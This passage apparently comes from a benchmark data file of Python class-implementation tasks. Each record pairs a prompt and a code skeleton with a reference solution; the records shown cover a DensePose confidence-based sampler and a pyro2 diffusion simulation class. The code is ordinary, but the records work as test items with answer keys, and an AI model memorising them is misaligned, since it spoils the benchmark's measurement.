sorted_confidence_indices[:search_count][sample_from_top]\n return index_sample\n<|end_body_1|>\n\n<|body_start_2|>\n converter = ToChartResultConverterWithConfidences\n chart_result = converter.convert(instance.pred_densepose, instance.pred_boxes)\n labels, dp_result = (chart_result.labels.cpu(), chart_result.uv.cpu())\n dp_result = torch.cat((dp_result, getattr(chart_result, self.confidence_channel)[None].cpu()))\n return (labels, dp_result)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000176", "length_bytes": 4801, "license_type": "permissive", "methods": [{"docstring": "Constructor Args: confidence_channel (str): confidence channel to use for sampling; possible values: \"sigma_2\": confidences for UV values \"fine_segm_confidence\": confidences for fine segmentation \"coarse_segm_confidence\": confidences for coarse segmentation (default: \"sigma_2\") count_per_class (int): the sampler produces at most `count_per_class` samples for each category (default: 8) search_count_multiplier (float or None): if not None, the total number of the most confident estimates of a given class to consider is defined as `min(search_count_multiplier * count_per_class, N)`, where `N` is the total number of estimates of the class; cannot be specified together with `search_proportion` (d", "name": "__init__", "signature": "def __init__(self, confidence_channel: str, count_per_class: int=8, search_count_multiplier: Optional[float]=None, search_proportion: Optional[float]=None)"}, {"docstring": "Produce a sample of indices to select data based on confidences Args: values (torch.Tensor): an array of size [n, k] that contains estimated values (U, V, confidences); n: number of channels (U, V, confidences) k: number of points labeled with part_id count (int): number of samples to produce, should be positive and <= k Return: list(int): indices of values (along axis 1) selected as a sample", "name": "_produce_index_sample", "signature": "def _produce_index_sample(self, values: torch.Tensor, count: int)"}, {"docstring": "Method to get labels and DensePose results from an instance, with confidences Args: instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences` Return: labels (torch.Tensor): shape [H, W], DensePose segmentation labels dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v stacked with the confidence channel", "name": "_produce_labels_and_results", "signature": "def _produce_labels_and_results(self, instance) -> Tuple[torch.Tensor, torch.Tensor]"}], "n_methods": 3, "prompt": "Implement the Python class `DensePoseConfidenceBasedSampler` described below.\n\nClass description:\nSamples DensePose data from DensePose predictions. Samples for each class are drawn using confidence value estimates.\n\nMethod signatures and docstrings:\n- def __init__(self, confidence_channel: str, count_per_class: int=8, search_count_multiplier: Optional[float]=None, search_proportion: Optional[float]=None): Constructor Args: confidence_channel (str): confidence channel to use for sampling; possible values: \"sigma_2\": confidences for UV values \"fine_segm_confidence\": confidences for fine segmentation \"coarse_segm_confidence\": confidences for coarse segmentation (default: \"sigma_2\") count_per_class (int): the sampler produces at most `count_per_class` samples for each category (default: 8) search_count_multiplier (float or None): if not None, the total number of the most confident estimates of a given class to consider is defined as `min(search_count_multiplier * count_per_class, N)`, where `N` is the total number of estimates of the class; cannot be specified together with `search_proportion` (d\n- def _produce_index_sample(self, values: torch.Tensor, count: int): Produce a sample of indices to select data based on confidences Args: values (torch.Tensor): an array of size [n, k] that contains estimated values (U, V, confidences); n: number of channels (U, V, confidences) k: number of points labeled with part_id count (int): number of samples to produce, should be positive and <= k Return: list(int): indices of values (along axis 1) selected as a sample\n- def _produce_labels_and_results(self, instance) -> Tuple[torch.Tensor, torch.Tensor]: Method to get labels and DensePose results from an instance, with confidences Args: instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences` Return: labels (torch.Tensor): shape [H, W], DensePose segmentation labels dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v stacked with the confidence channel", "prompted_full_text": "Implement the Python class `DensePoseConfidenceBasedSampler` described below.\n\nClass description:\nSamples DensePose data from DensePose predictions. Samples for each class are drawn using confidence value estimates.\n\nMethod signatures and docstrings:\n- def __init__(self, confidence_channel: str, count_per_class: int=8, search_count_multiplier: Optional[float]=None, search_proportion: Optional[float]=None): Constructor Args: confidence_channel (str): confidence channel to use for sampling; possible values: \"sigma_2\": confidences for UV values \"fine_segm_confidence\": confidences for fine segmentation \"coarse_segm_confidence\": confidences for coarse segmentation (default: \"sigma_2\") count_per_class (int): the sampler produces at most `count_per_class` samples for each category (default: 8) search_count_multiplier (float or None): if not None, the total number of the most confident estimates of a given class to consider is defined as `min(search_count_multiplier * count_per_class, N)`, where `N` is the total number of estimates of the class; cannot be specified together with `search_proportion` (d\n- def _produce_index_sample(self, values: torch.Tensor, count: int): Produce a sample of indices to select data based on confidences Args: values (torch.Tensor): an array of size [n, k] that contains estimated values (U, V, confidences); n: number of channels (U, V, confidences) k: number of points labeled with part_id count (int): number of samples to produce, should be positive and <= k Return: list(int): indices of values (along axis 1) selected as a sample\n- def _produce_labels_and_results(self, instance) -> Tuple[torch.Tensor, torch.Tensor]: Method to get labels and DensePose results from an instance, with confidences Args: instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences` Return: labels (torch.Tensor): shape [H, W], DensePose segmentation labels dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v stacked with the confidence channel\n\n<|skeleton|>\nclass DensePoseConfidenceBasedSampler:\n \"\"\"Samples DensePose data from DensePose predictions. Samples for each class are drawn using confidence value estimates.\"\"\"\n\n def __init__(self, confidence_channel: str, count_per_class: int=8, search_count_multiplier: Optional[float]=None, search_proportion: Optional[float]=None):\n \"\"\"Constructor Args: confidence_channel (str): confidence channel to use for sampling; possible values: \"sigma_2\": confidences for UV values \"fine_segm_confidence\": confidences for fine segmentation \"coarse_segm_confidence\": confidences for coarse segmentation (default: \"sigma_2\") count_per_class (int): the sampler produces at most `count_per_class` samples for each category (default: 8) search_count_multiplier (float or None): if not None, the total number of the most confident estimates of a given class to consider is defined as `min(search_count_multiplier * count_per_class, N)`, where `N` is the total number of estimates of the class; cannot be specified together with `search_proportion` (d\"\"\"\n <|body_0|>\n\n def _produce_index_sample(self, values: torch.Tensor, count: int):\n \"\"\"Produce a sample of indices to select data based on confidences Args: values (torch.Tensor): an array of size [n, k] that contains estimated values (U, V, confidences); n: number of channels (U, V, confidences) k: number of points labeled with part_id count (int): number of samples to produce, should be positive and <= k Return: list(int): indices of values (along axis 1) selected as a sample\"\"\"\n <|body_1|>\n\n def _produce_labels_and_results(self, instance) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Method to get labels and DensePose results from an instance, with confidences Args: instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences` Return: labels (torch.Tensor): shape [H, W], DensePose segmentation labels dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v stacked with the confidence channel\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(count_per_class)\n self.confidence_channel = confidence_channel\n self.search_count_multiplier = search_count_multiplier\n self.search_proportion = search_proportion\n assert search_count_multiplier is None or search_proportion is None, f'Cannot specify both search_count_multiplier (={search_count_multiplier})and search_proportion (={search_proportion})'\n<|end_body_0|>\n\n<|body_start_1|>\n k = values.shape[1]\n if k == count:\n index_sample = list(range(k))\n else:\n _, sorted_confidence_indices = torch.sort(values[2])\n if self.search_count_multiplier is not None:\n search_count = min(int(count * self.search_count_multiplier), k)\n elif self.search_proportion is not None:\n search_count = min(max(int(k * self.search_proportion), count), k)\n else:\n search_count = min(count, k)\n sample_from_top = random.sample(range(search_count), count)\n index_sample = sorted_confidence_indices[:search_count][sample_from_top]\n return index_sample\n<|end_body_1|>\n\n<|body_start_2|>\n converter = ToChartResultConverterWithConfidences\n chart_result = converter.convert(instance.pred_densepose, instance.pred_boxes)\n labels, dp_result = (chart_result.labels.cpu(), chart_result.uv.cpu())\n dp_result = torch.cat((dp_result, getattr(chart_result, self.confidence_channel)[None].cpu()))\n return (labels, dp_result)\n<|end_body_2|>\n", "revision_id": "80307d2d5e06f06a8a677cc2653f23a4c56402ac", "skeleton": "<|skeleton|>\nclass DensePoseConfidenceBasedSampler:\n \"\"\"Samples DensePose data from DensePose predictions. Samples for each class are drawn using confidence value estimates.\"\"\"\n\n def __init__(self, confidence_channel: str, count_per_class: int=8, search_count_multiplier: Optional[float]=None, search_proportion: Optional[float]=None):\n \"\"\"Constructor Args: confidence_channel (str): confidence channel to use for sampling; possible values: \"sigma_2\": confidences for UV values \"fine_segm_confidence\": confidences for fine segmentation \"coarse_segm_confidence\": confidences for coarse segmentation (default: \"sigma_2\") count_per_class (int): the sampler produces at most `count_per_class` samples for each category (default: 8) search_count_multiplier (float or None): if not None, the total number of the most confident estimates of a given class to consider is defined as `min(search_count_multiplier * count_per_class, N)`, where `N` is the total number of estimates of the class; cannot be specified together with `search_proportion` (d\"\"\"\n <|body_0|>\n\n def _produce_index_sample(self, values: torch.Tensor, count: int):\n \"\"\"Produce a sample of indices to select data based on confidences Args: values (torch.Tensor): an array of size [n, k] that contains estimated values (U, V, confidences); n: number of channels (U, V, confidences) k: number of points labeled with part_id count (int): number of samples to produce, should be positive and <= k Return: list(int): indices of values (along axis 1) selected as a sample\"\"\"\n <|body_1|>\n\n def _produce_labels_and_results(self, instance) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Method to get labels and DensePose results from an instance, with confidences Args: instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences` Return: labels (torch.Tensor): shape [H, W], DensePose segmentation labels dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v stacked with the confidence channel\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DensePoseConfidenceBasedSampler:\n \"\"\"Samples DensePose data from DensePose predictions. Samples for each class are drawn using confidence value estimates.\"\"\"\n\n def __init__(self, confidence_channel: str, count_per_class: int=8, search_count_multiplier: Optional[float]=None, search_proportion: Optional[float]=None):\n \"\"\"Constructor Args: confidence_channel (str): confidence channel to use for sampling; possible values: \"sigma_2\": confidences for UV values \"fine_segm_confidence\": confidences for fine segmentation \"coarse_segm_confidence\": confidences for coarse segmentation (default: \"sigma_2\") count_per_class (int): the sampler produces at most `count_per_class` samples for each category (default: 8) search_count_multiplier (float or None): if not None, the total number of the most confident estimates of a given class to consider is defined as `min(search_count_multiplier * count_per_class, N)`, where `N` is the total number of estimates of the class; cannot be specified together with `search_proportion` (d\"\"\"\n super().__init__(count_per_class)\n self.confidence_channel = confidence_channel\n self.search_count_multiplier = search_count_multiplier\n self.search_proportion = search_proportion\n assert search_count_multiplier is None or search_proportion is None, f'Cannot specify both search_count_multiplier (={search_count_multiplier})and search_proportion (={search_proportion})'\n\n def _produce_index_sample(self, values: torch.Tensor, count: int):\n \"\"\"Produce a sample of indices to select data based on confidences Args: values (torch.Tensor): an array of size [n, k] that contains estimated values (U, V, confidences); n: number of channels (U, V, confidences) k: number of points labeled with part_id count (int): number of samples to produce, should be positive and <= k Return: list(int): indices of values (along axis 1) selected as a sample\"\"\"\n k = values.shape[1]\n if k == count:\n index_sample = list(range(k))\n else:\n _, sorted_confidence_indices = torch.sort(values[2])\n if self.search_count_multiplier is not None:\n search_count = min(int(count * self.search_count_multiplier), k)\n elif self.search_proportion is not None:\n search_count = min(max(int(k * self.search_proportion), count), k)\n else:\n search_count = min(count, k)\n sample_from_top = random.sample(range(search_count), count)\n index_sample = sorted_confidence_indices[:search_count][sample_from_top]\n return index_sample\n\n def _produce_labels_and_results(self, instance) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Method to get labels and DensePose results from an instance, with confidences Args: instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences` Return: labels (torch.Tensor): shape [H, W], DensePose segmentation labels dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v stacked with the confidence channel\"\"\"\n converter = ToChartResultConverterWithConfidences\n chart_result = converter.convert(instance.pred_densepose, instance.pred_boxes)\n labels, dp_result = (chart_result.labels.cpu(), chart_result.uv.cpu())\n dp_result = torch.cat((dp_result, getattr(chart_result, self.confidence_channel)[None].cpu()))\n return (labels, dp_result)\n", "source": "the_stack_v2_python_sparse", "source_path": "projects/DensePose/densepose/data/samplers/densepose_confidence_based.py", "source_repo": "facebookresearch/detectron2", "split": "test", "star_events_count": 27469} {"blob_id": "4758b46fc3d7eba6bce47d6e671bf1940552519a", "bodies": ["my_grid = grid_setup(self.rp, ng=1)\nif my_grid.nx != my_grid.ny:\n msg.fail('need nx = ny for diffusion problems')\nn = int(math.log(my_grid.nx) / math.log(2.0))\nif 2 ** n != my_grid.nx:\n msg.fail('grid needs to be a power of 2')\nbc, _, _ = bc_setup(self.rp)\nfor bnd in [bc.xlb, bc.xrb, bc.ylb, bc.yrb]:\n if bnd not in ['periodic', 'neumann', 'dirichlet']:\n msg.fail('invalid BC')\nmy_data = patch.CellCenterData2d(my_grid)\nmy_data.register_var('phi', bc)\nmy_data.create()\nself.cc_data = my_data\nproblem = importlib.import_module(f'pyro.diffusion.problems.{self.problem_name}')\nproblem.init_data(self.cc_data, self.rp)", "cfl = self.rp.get_param('driver.cfl')\nk = self.rp.get_param('diffusion.k')\nxtmp = self.cc_data.grid.dx ** 2 / k\nytmp = self.cc_data.grid.dy ** 2 / k\nself.dt = cfl * min(xtmp, ytmp)", "self.cc_data.fill_BC_all()\nphi = self.cc_data.get_var('phi')\nmyg = self.cc_data.grid\nk = self.rp.get_param('diffusion.k')\nmg = MG.CellCenterMG2d(myg.nx, myg.ny, xmin=myg.xmin, xmax=myg.xmax, ymin=myg.ymin, ymax=myg.ymax, xl_BC_type=self.cc_data.BCs['phi'].xlb, xr_BC_type=self.cc_data.BCs['phi'].xrb, yl_BC_type=self.cc_data.BCs['phi'].ylb, yr_BC_type=self.cc_data.BCs['phi'].yrb, alpha=1.0, beta=0.5 * self.dt * k, verbose=0)\nf = mg.soln_grid.scratch_array()\nf.v()[:, :] = phi.v() + 0.5 * self.dt * k * ((phi.ip(1) + phi.ip(-1) - 2.0 * phi.v()) / myg.dx ** 2 + (phi.jp(1) + phi.jp(-1) - 2.0 * phi.v()) / myg.dy ** 2)\nmg.init_RHS(f)\nmg.init_zeros()\nmg.solve(rtol=1e-10)\nphi.v()[:, :] = mg.get_solution().v()\nself.cc_data.t += self.dt\nself.n += 1", "plt.clf()\nphi = self.cc_data.get_var('phi')\nmyg = self.cc_data.grid\nimg = plt.imshow(np.transpose(phi.v()), interpolation='nearest', origin='lower', extent=[myg.xmin, myg.xmax, myg.ymin, myg.ymax], cmap=self.cm)\nplt.xlabel('x')\nplt.ylabel('y')\nplt.title('phi')\ncb = plt.colorbar(img)\ncb.formatter = matplotlib.ticker.FormatStrFormatter('')\nplt.figtext(0.05, 0.0125, f't = {self.cc_data.t:10.5f}')\nplt.pause(0.001)\nplt.draw()"], "bodies_text": "<|body_start_0|>\n my_grid = grid_setup(self.rp, ng=1)\n if my_grid.nx != my_grid.ny:\n msg.fail('need nx = ny for diffusion problems')\n n = int(math.log(my_grid.nx) / math.log(2.0))\n if 2 ** n != my_grid.nx:\n msg.fail('grid needs to be a power of 2')\n bc, _, _ = bc_setup(self.rp)\n for bnd in [bc.xlb, bc.xrb, bc.ylb, bc.yrb]:\n if bnd not in ['periodic', 'neumann', 'dirichlet']:\n msg.fail('invalid BC')\n my_data = patch.CellCenterData2d(my_grid)\n my_data.register_var('phi', bc)\n my_data.create()\n self.cc_data = my_data\n problem = importlib.import_module(f'pyro.diffusion.problems.{self.problem_name}')\n problem.init_data(self.cc_data, self.rp)\n<|end_body_0|>\n\n<|body_start_1|>\n cfl = self.rp.get_param('driver.cfl')\n k = self.rp.get_param('diffusion.k')\n xtmp = self.cc_data.grid.dx ** 2 / k\n ytmp = self.cc_data.grid.dy ** 2 / k\n self.dt = cfl * min(xtmp, ytmp)\n<|end_body_1|>\n\n<|body_start_2|>\n self.cc_data.fill_BC_all()\n phi = self.cc_data.get_var('phi')\n myg = self.cc_data.grid\n k = self.rp.get_param('diffusion.k')\n mg = MG.CellCenterMG2d(myg.nx, myg.ny, xmin=myg.xmin, xmax=myg.xmax, ymin=myg.ymin, ymax=myg.ymax, xl_BC_type=self.cc_data.BCs['phi'].xlb, xr_BC_type=self.cc_data.BCs['phi'].xrb, yl_BC_type=self.cc_data.BCs['phi'].ylb, yr_BC_type=self.cc_data.BCs['phi'].yrb, alpha=1.0, beta=0.5 * self.dt * k, verbose=0)\n f = mg.soln_grid.scratch_array()\n f.v()[:, :] = phi.v() + 0.5 * self.dt * k * ((phi.ip(1) + phi.ip(-1) - 2.0 * phi.v()) / myg.dx ** 2 + (phi.jp(1) + phi.jp(-1) - 2.0 * phi.v()) / myg.dy ** 2)\n mg.init_RHS(f)\n mg.init_zeros()\n mg.solve(rtol=1e-10)\n phi.v()[:, :] = mg.get_solution().v()\n self.cc_data.t += self.dt\n self.n += 1\n<|end_body_2|>\n\n<|body_start_3|>\n plt.clf()\n phi = self.cc_data.get_var('phi')\n myg = self.cc_data.grid\n img = plt.imshow(np.transpose(phi.v()), interpolation='nearest', origin='lower', extent=[myg.xmin, myg.xmax, myg.ymin, myg.ymax], cmap=self.cm)\n plt.xlabel('x')\n plt.ylabel('y')\n plt.title('phi')\n cb = plt.colorbar(img)\n cb.formatter = matplotlib.ticker.FormatStrFormatter('')\n plt.figtext(0.05, 0.0125, f't = {self.cc_data.t:10.5f}')\n plt.pause(0.001)\n plt.draw()\n<|end_body_3|>\n", "class_docstring": "A simulation of diffusion", "class_name": "Simulation", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Simulation:\n \"\"\"A simulation of diffusion\"\"\"\n\n def initialize(self):\n \"\"\"Initialize the grid and variables for diffusion and set the initial conditions for the chosen problem.\"\"\"\n <|body_0|>\n\n def method_compute_timestep(self):\n \"\"\"The diffusion timestep() function computes the timestep using the explicit timestep constraint as the starting point. We then multiply by the CFL number to get the timestep. Since we are doing an implicit discretization, we do not require CFL < 1.\"\"\"\n <|body_1|>\n\n def evolve(self):\n \"\"\"Diffusion through dt using C-N implicit solve with multigrid\"\"\"\n <|body_2|>\n\n def dovis(self):\n \"\"\"Do runtime visualization.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n my_grid = grid_setup(self.rp, ng=1)\n if my_grid.nx != my_grid.ny:\n msg.fail('need nx = ny for diffusion problems')\n n = int(math.log(my_grid.nx) / math.log(2.0))\n if 2 ** n != my_grid.nx:\n msg.fail('grid needs to be a power of 2')\n bc, _, _ = bc_setup(self.rp)\n for bnd in [bc.xlb, bc.xrb, bc.ylb, bc.yrb]:\n if bnd not in ['periodic', 'neumann', 'dirichlet']:\n msg.fail('invalid BC')\n my_data = patch.CellCenterData2d(my_grid)\n my_data.register_var('phi', bc)\n my_data.create()\n self.cc_data = my_data\n problem = importlib.import_module(f'pyro.diffusion.problems.{self.problem_name}')\n problem.init_data(self.cc_data, self.rp)\n<|end_body_0|>\n\n<|body_start_1|>\n cfl = self.rp.get_param('driver.cfl')\n k = self.rp.get_param('diffusion.k')\n xtmp = self.cc_data.grid.dx ** 2 / k\n ytmp = self.cc_data.grid.dy ** 2 / k\n self.dt = cfl * min(xtmp, ytmp)\n<|end_body_1|>\n\n<|body_start_2|>\n self.cc_data.fill_BC_all()\n phi = self.cc_data.get_var('phi')\n myg = self.cc_data.grid\n k = self.rp.get_param('diffusion.k')\n mg = MG.CellCenterMG2d(myg.nx, myg.ny, xmin=myg.xmin, xmax=myg.xmax, ymin=myg.ymin, ymax=myg.ymax, xl_BC_type=self.cc_data.BCs['phi'].xlb, xr_BC_type=self.cc_data.BCs['phi'].xrb, yl_BC_type=self.cc_data.BCs['phi'].ylb, yr_BC_type=self.cc_data.BCs['phi'].yrb, alpha=1.0, beta=0.5 * self.dt * k, verbose=0)\n f = mg.soln_grid.scratch_array()\n f.v()[:, :] = phi.v() + 0.5 * self.dt * k * ((phi.ip(1) + phi.ip(-1) - 2.0 * phi.v()) / myg.dx ** 2 + (phi.jp(1) + phi.jp(-1) - 2.0 * phi.v()) / myg.dy ** 2)\n mg.init_RHS(f)\n mg.init_zeros()\n mg.solve(rtol=1e-10)\n phi.v()[:, :] = mg.get_solution().v()\n self.cc_data.t += self.dt\n self.n += 1\n<|end_body_2|>\n\n<|body_start_3|>\n plt.clf()\n phi = self.cc_data.get_var('phi')\n myg = self.cc_data.grid\n img = plt.imshow(np.transpose(phi.v()), interpolation='nearest', origin='lower', extent=[myg.xmin, myg.xmax, myg.ymin, myg.ymax], cmap=self.cm)\n plt.xlabel('x')\n plt.ylabel('y')\n plt.title('phi')\n cb = plt.colorbar(img)\n cb.formatter = matplotlib.ticker.FormatStrFormatter('')\n plt.figtext(0.05, 0.0125, f't = {self.cc_data.t:10.5f}')\n plt.pause(0.001)\n plt.draw()\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000177", "length_bytes": 4737, "license_type": "permissive", "methods": [{"docstring": "Initialize the grid and variables for diffusion and set the initial conditions for the chosen problem.", "name": "initialize", "signature": "def initialize(self)"}, {"docstring": "The diffusion timestep() function computes the timestep using the explicit timestep constraint as the starting point. We then multiply by the CFL number to get the timestep. Since we are doing an implicit discretization, we do not require CFL < 1.", "name": "method_compute_timestep", "signature": "def method_compute_timestep(self)"}, {"docstring": "Diffusion through dt using C-N implicit solve with multigrid", "name": "evolve", "signature": "def evolve(self)"}, {"docstring": "Do runtime visualization.", "name": "dovis", "signature": "def dovis(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_test_000367", "prompt": "Implement the Python class `Simulation` described below.\n\nClass description:\nA simulation of diffusion\n\nMethod signatures and docstrings:\n- def initialize(self): Initialize the grid and variables for diffusion and set the initial conditions for the chosen problem.\n- def method_compute_timestep(self): The diffusion timestep() function computes the timestep using the explicit timestep constraint as the starting point. We then multiply by the CFL number to get the timestep. Since we are doing an implicit discretization, we do not require CFL < 1.\n- def evolve(self): Diffusion through dt using C-N implicit solve with multigrid\n- def dovis(self): Do runtime visualization.", "prompted_full_text": "Implement the Python class `Simulation` described below.\n\nClass description:\nA simulation of diffusion\n\nMethod signatures and docstrings:\n- def initialize(self): Initialize the grid and variables for diffusion and set the initial conditions for the chosen problem.\n- def method_compute_timestep(self): The diffusion timestep() function computes the timestep using the explicit timestep constraint as the starting point. We then multiply by the CFL number to get the timestep. Since we are doing an implicit discretization, we do not require CFL < 1.\n- def evolve(self): Diffusion through dt using C-N implicit solve with multigrid\n- def dovis(self): Do runtime visualization.\n\n<|skeleton|>\nclass Simulation:\n \"\"\"A simulation of diffusion\"\"\"\n\n def initialize(self):\n \"\"\"Initialize the grid and variables for diffusion and set the initial conditions for the chosen problem.\"\"\"\n <|body_0|>\n\n def method_compute_timestep(self):\n \"\"\"The diffusion timestep() function computes the timestep using the explicit timestep constraint as the starting point. We then multiply by the CFL number to get the timestep. Since we are doing an implicit discretization, we do not require CFL < 1.\"\"\"\n <|body_1|>\n\n def evolve(self):\n \"\"\"Diffusion through dt using C-N implicit solve with multigrid\"\"\"\n <|body_2|>\n\n def dovis(self):\n \"\"\"Do runtime visualization.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n my_grid = grid_setup(self.rp, ng=1)\n if my_grid.nx != my_grid.ny:\n msg.fail('need nx = ny for diffusion problems')\n n = int(math.log(my_grid.nx) / math.log(2.0))\n if 2 ** n != my_grid.nx:\n msg.fail('grid needs to be a power of 2')\n bc, _, _ = bc_setup(self.rp)\n for bnd in [bc.xlb, bc.xrb, bc.ylb, bc.yrb]:\n if bnd not in ['periodic', 'neumann', 'dirichlet']:\n msg.fail('invalid BC')\n my_data = patch.CellCenterData2d(my_grid)\n my_data.register_var('phi', bc)\n my_data.create()\n self.cc_data = my_data\n problem = importlib.import_module(f'pyro.diffusion.problems.{self.problem_name}')\n problem.init_data(self.cc_data, self.rp)\n<|end_body_0|>\n\n<|body_start_1|>\n cfl = self.rp.get_param('driver.cfl')\n k = self.rp.get_param('diffusion.k')\n xtmp = self.cc_data.grid.dx ** 2 / k\n ytmp = self.cc_data.grid.dy ** 2 / k\n self.dt = cfl * min(xtmp, ytmp)\n<|end_body_1|>\n\n<|body_start_2|>\n self.cc_data.fill_BC_all()\n phi = self.cc_data.get_var('phi')\n myg = self.cc_data.grid\n k = self.rp.get_param('diffusion.k')\n mg = MG.CellCenterMG2d(myg.nx, myg.ny, xmin=myg.xmin, xmax=myg.xmax, ymin=myg.ymin, ymax=myg.ymax, xl_BC_type=self.cc_data.BCs['phi'].xlb, xr_BC_type=self.cc_data.BCs['phi'].xrb, yl_BC_type=self.cc_data.BCs['phi'].ylb, yr_BC_type=self.cc_data.BCs['phi'].yrb, alpha=1.0, beta=0.5 * self.dt * k, verbose=0)\n f = mg.soln_grid.scratch_array()\n f.v()[:, :] = phi.v() + 0.5 * self.dt * k * ((phi.ip(1) + phi.ip(-1) - 2.0 * phi.v()) / myg.dx ** 2 + (phi.jp(1) + phi.jp(-1) - 2.0 * phi.v()) / myg.dy ** 2)\n mg.init_RHS(f)\n mg.init_zeros()\n mg.solve(rtol=1e-10)\n phi.v()[:, :] = mg.get_solution().v()\n self.cc_data.t += self.dt\n self.n += 1\n<|end_body_2|>\n\n<|body_start_3|>\n plt.clf()\n phi = self.cc_data.get_var('phi')\n myg = self.cc_data.grid\n img = plt.imshow(np.transpose(phi.v()), interpolation='nearest', origin='lower', extent=[myg.xmin, myg.xmax, myg.ymin, myg.ymax], cmap=self.cm)\n plt.xlabel('x')\n plt.ylabel('y')\n plt.title('phi')\n cb = plt.colorbar(img)\n cb.formatter = matplotlib.ticker.FormatStrFormatter('')\n plt.figtext(0.05, 0.0125, f't = {self.cc_data.t:10.5f}')\n plt.pause(0.001)\n plt.draw()\n<|end_body_3|>\n", "revision_id": "f91789a319caa98dfbc3f496e9953756e6ee3ca9", "skeleton": "<|skeleton|>\nclass Simulation:\n \"\"\"A simulation of diffusion\"\"\"\n\n def initialize(self):\n \"\"\"Initialize the grid and variables for diffusion and set the initial conditions for the chosen problem.\"\"\"\n <|body_0|>\n\n def method_compute_timestep(self):\n \"\"\"The diffusion timestep() function computes the timestep using the explicit timestep constraint as the starting point. We then multiply by the CFL number to get the timestep. Since we are doing an implicit discretization, we do not require CFL < 1.\"\"\"\n <|body_1|>\n\n def evolve(self):\n \"\"\"Diffusion through dt using C-N implicit solve with multigrid\"\"\"\n <|body_2|>\n\n def dovis(self):\n \"\"\"Do runtime visualization.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Simulation:\n \"\"\"A simulation of diffusion\"\"\"\n\n def initialize(self):\n \"\"\"Initialize the grid and variables for diffusion and set the initial conditions for the chosen problem.\"\"\"\n my_grid = grid_setup(self.rp, ng=1)\n if my_grid.nx != my_grid.ny:\n msg.fail('need nx = ny for diffusion problems')\n n = int(math.log(my_grid.nx) / math.log(2.0))\n if 2 ** n != my_grid.nx:\n msg.fail('grid needs to be a power of 2')\n bc, _, _ = bc_setup(self.rp)\n for bnd in [bc.xlb, bc.xrb, bc.ylb, bc.yrb]:\n if bnd not in ['periodic', 'neumann', 'dirichlet']:\n msg.fail('invalid BC')\n my_data = patch.CellCenterData2d(my_grid)\n my_data.register_var('phi', bc)\n my_data.create()\n self.cc_data = my_data\n problem = importlib.import_module(f'pyro.diffusion.problems.{self.problem_name}')\n problem.init_data(self.cc_data, self.rp)\n\n def method_compute_timestep(self):\n \"\"\"The diffusion timestep() function computes the timestep using the explicit timestep constraint as the starting point. We then multiply by the CFL number to get the timestep. Since we are doing an implicit discretization, we do not require CFL < 1.\"\"\"\n cfl = self.rp.get_param('driver.cfl')\n k = self.rp.get_param('diffusion.k')\n xtmp = self.cc_data.grid.dx ** 2 / k\n ytmp = self.cc_data.grid.dy ** 2 / k\n self.dt = cfl * min(xtmp, ytmp)\n\n def evolve(self):\n \"\"\"Diffusion through dt using C-N implicit solve with multigrid\"\"\"\n self.cc_data.fill_BC_all()\n phi = self.cc_data.get_var('phi')\n myg = self.cc_data.grid\n k = self.rp.get_param('diffusion.k')\n mg = MG.CellCenterMG2d(myg.nx, myg.ny, xmin=myg.xmin, xmax=myg.xmax, ymin=myg.ymin, ymax=myg.ymax, xl_BC_type=self.cc_data.BCs['phi'].xlb, xr_BC_type=self.cc_data.BCs['phi'].xrb, yl_BC_type=self.cc_data.BCs['phi'].ylb, yr_BC_type=self.cc_data.BCs['phi'].yrb, alpha=1.0, beta=0.5 * self.dt * k, verbose=0)\n f = mg.soln_grid.scratch_array()\n f.v()[:, :] = phi.v() + 0.5 * self.dt * k * ((phi.ip(1) + phi.ip(-1) - 2.0 * phi.v()) / myg.dx ** 2 + (phi.jp(1) + phi.jp(-1) - 2.0 * phi.v()) / myg.dy ** 2)\n mg.init_RHS(f)\n mg.init_zeros()\n mg.solve(rtol=1e-10)\n phi.v()[:, :] = mg.get_solution().v()\n self.cc_data.t += self.dt\n self.n += 1\n\n def dovis(self):\n \"\"\"Do runtime visualization.\"\"\"\n plt.clf()\n phi = self.cc_data.get_var('phi')\n myg = self.cc_data.grid\n img = plt.imshow(np.transpose(phi.v()), interpolation='nearest', origin='lower', extent=[myg.xmin, myg.xmax, myg.ymin, myg.ymax], cmap=self.cm)\n plt.xlabel('x')\n plt.ylabel('y')\n plt.title('phi')\n cb = plt.colorbar(img)\n cb.formatter = matplotlib.ticker.FormatStrFormatter('')\n plt.figtext(0.05, 0.0125, f't = {self.cc_data.t:10.5f}')\n plt.pause(0.001)\n plt.draw()\n", "source": "the_stack_v2_python_sparse", "source_path": "pyro/diffusion/simulation.py", "source_repo": "python-hydro/pyro2", "split": "test", "star_events_count": 202} {"blob_id": "312d98cc9a1d211b5c6bccf390a19ca0c3251c49", "bodies": ["existing_rows = self.select(table, columns)\nunique = diff(existing_rows, values, y_only=True)\nkeys = self.get_primary_key_vals(table)\npk_col = self.get_primary_key(table)\npk_index = 